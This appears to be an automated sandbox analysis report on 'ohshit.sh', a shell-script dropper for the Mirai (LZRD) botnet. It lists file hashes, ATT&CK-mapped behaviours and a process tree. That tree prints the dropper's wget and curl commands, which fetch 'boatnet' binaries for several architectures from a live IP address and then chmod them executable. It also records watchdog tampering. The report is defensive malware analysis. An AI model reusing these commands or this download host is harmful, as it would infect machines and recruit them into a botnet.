Analysis
-
max time kernel
149s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-02-2025 16:21
Static task
static1
Behavioral task
behavioral1
Sample
ohshit.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
ohshit.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
ohshit.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
ohshit.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
ohshit.sh
-
Size
2KB
-
MD5
f0977aee35c9bf421f707b9bfba5d9f7
-
SHA1
5eacb3c68403f8f9c853f41914f27d5abc8645f5
-
SHA256
f3e6052d4142e5a195e03e65d4a8acd2b7d6e790b6aacbc690ae909e7edb01f6
-
SHA512
3184f088b0188b537c6a9ba0aa037c586d3267f17a11d4e6fbb65745b21dafbf37506e359dae372993fb6e28a06e3749b0b5a382901ac805cce83988772f53d9
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1514 chmod 1522 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/WTF 1515 ohshit.sh /tmp/WTF 1523 ohshit.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ohshit.sh File opened for modification /dev/misc/watchdog ohshit.sh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog ohshit.sh File opened for modification /bin/watchdog ohshit.sh -
resource yara_rule behavioral1/files/fstream-1.dat upx -
description ioc Process File opened for reading /proc/599/cmdline ohshit.sh File opened for reading /proc/1078/cmdline ohshit.sh File opened for reading /proc/1316/cmdline ohshit.sh File opened for reading /proc/1516/cmdline ohshit.sh File opened for reading /proc/1610/cmdline ohshit.sh File opened for reading /proc/513/cmdline ohshit.sh File opened for reading /proc/984/cmdline ohshit.sh File opened for reading /proc/1536/cmdline ohshit.sh File opened for reading /proc/641/cmdline ohshit.sh File opened for reading /proc/1295/cmdline ohshit.sh File opened for reading /proc/1505/cmdline ohshit.sh File opened for reading /proc/484/cmdline ohshit.sh File opened for reading /proc/1225/cmdline ohshit.sh File opened for reading /proc/1253/cmdline ohshit.sh File opened for reading /proc/1562/cmdline ohshit.sh File opened for reading /proc/1082/cmdline ohshit.sh File opened for reading /proc/1145/cmdline ohshit.sh File opened for reading /proc/1254/cmdline ohshit.sh File opened for reading /proc/1021/cmdline ohshit.sh File opened for reading /proc/1119/cmdline ohshit.sh File opened for reading /proc/1477/cmdline ohshit.sh File opened for reading /proc/1016/cmdline ohshit.sh File opened for reading /proc/1180/cmdline ohshit.sh File opened for reading /proc/1550/cmdline ohshit.sh File opened for reading /proc/686/cmdline ohshit.sh File opened for reading /proc/1035/cmdline ohshit.sh File opened for reading /proc/1224/cmdline ohshit.sh File opened for reading /proc/1502/cmdline ohshit.sh File opened for reading /proc/473/cmdline ohshit.sh File opened for reading /proc/656/cmdline ohshit.sh File opened for reading /proc/662/cmdline ohshit.sh File opened for reading /proc/1556/cmdline ohshit.sh File opened for reading /proc/1574/cmdline ohshit.sh File opened for reading /proc/1190/cmdline ohshit.sh File opened for reading /proc/1526/cmdline ohshit.sh File opened for reading /proc/415/cmdline ohshit.sh File opened for reading /proc/1162/cmdline ohshit.sh File opened for reading /proc/1592/cmdline ohshit.sh File opened for reading /proc/459/cmdline ohshit.sh File opened for reading /proc/514/cmdline ohshit.sh File opened for reading /proc/768/cmdline ohshit.sh File opened for reading /proc/1064/cmdline ohshit.sh File opened for reading /proc/1142/cmdline ohshit.sh File opened for reading /proc/1144/cmdline ohshit.sh File opened for reading /proc/1524/cmdline ohshit.sh File opened for reading /proc/1101/cmdline ohshit.sh File opened for reading /proc/1158/cmdline ohshit.sh File opened for reading /proc/1268/cmdline ohshit.sh File opened for reading /proc/1304/cmdline ohshit.sh File opened for reading /proc/1568/cmdline ohshit.sh File opened for reading /proc/989/cmdline ohshit.sh File opened for reading /proc/1507/cmdline ohshit.sh File opened for reading /proc/1580/cmdline ohshit.sh File opened for reading /proc/428/cmdline ohshit.sh File opened for reading /proc/598/cmdline ohshit.sh File opened for reading /proc/1002/cmdline ohshit.sh File opened for reading /proc/1068/cmdline ohshit.sh File opened for reading /proc/437/cmdline ohshit.sh File opened for reading /proc/472/cmdline ohshit.sh File opened for reading /proc/526/cmdline ohshit.sh File opened for reading /proc/570/cmdline ohshit.sh File opened for reading /proc/927/cmdline ohshit.sh File opened for reading /proc/1041/cmdline ohshit.sh File opened for reading /proc/1058/cmdline ohshit.sh -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1519 wget 1520 curl -
Writes file to tmp directory 6 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/boatnet.arc wget File opened for modification /tmp/boatnet.x86 wget File opened for modification /tmp/boatnet.x86 curl File opened for modification /tmp/WTF ohshit.sh File opened for modification /tmp/boatnet.mips wget File opened for modification /tmp/boatnet.mips curl
Processes
-
/tmp/ohshit.sh/tmp/ohshit.sh1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1507 -
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1508
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.x862⤵
- Writes file to tmp directory
PID:1512
-
-
/bin/catcat boatnet.x862⤵PID:1513
-
-
/bin/chmodchmod +x boatnet.x86 config-err-gSYeSF netplan_escgt653 ohshit.sh snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-mHH1Rm WTF2⤵
- File and Directory Permissions Modification
PID:1514
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1519
-
-
/usr/bin/curlcurl -O http://194.85.251.9/hiddenbin/boatnet.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x boatnet.mips boatnet.x86 config-err-gSYeSF netplan_escgt653 ohshit.sh snap-private-tmp ssh-DGjiLaK51db6 systemd-private-7d704eabf2e542bc8051481b6b431471-bolt.service-e6jDAF systemd-private-7d704eabf2e542bc8051481b6b431471-colord.service-KeVe2N systemd-private-7d704eabf2e542bc8051481b6b431471-ModemManager.service-AQvz0Z systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-resolved.service-Km8n5c systemd-private-7d704eabf2e542bc8051481b6b431471-systemd-timedated.service-mHH1Rm WTF2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/usr/bin/wgetwget http://194.85.251.9/hiddenbin/boatnet.arc2⤵
- Writes file to tmp directory
PID:1527
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
29KB
MD58231c76be6663e62d7d5a8ea685ff498
SHA103177493e6a6d9e3b7aaca572245065ffcfe0575
SHA256c45cbd5ce92e34f62bd3e1e19c36daf662860aac2a22a5d67924788acc71e3bc
SHA5121a8eb5eaf84d38252f4535a2a89aca76fadf7854d218c6bca7ec2521ee485d9bd082e3eeff4ec981abaf0e18afc0eed7415ae656d3080b152fb7b35370caa9ac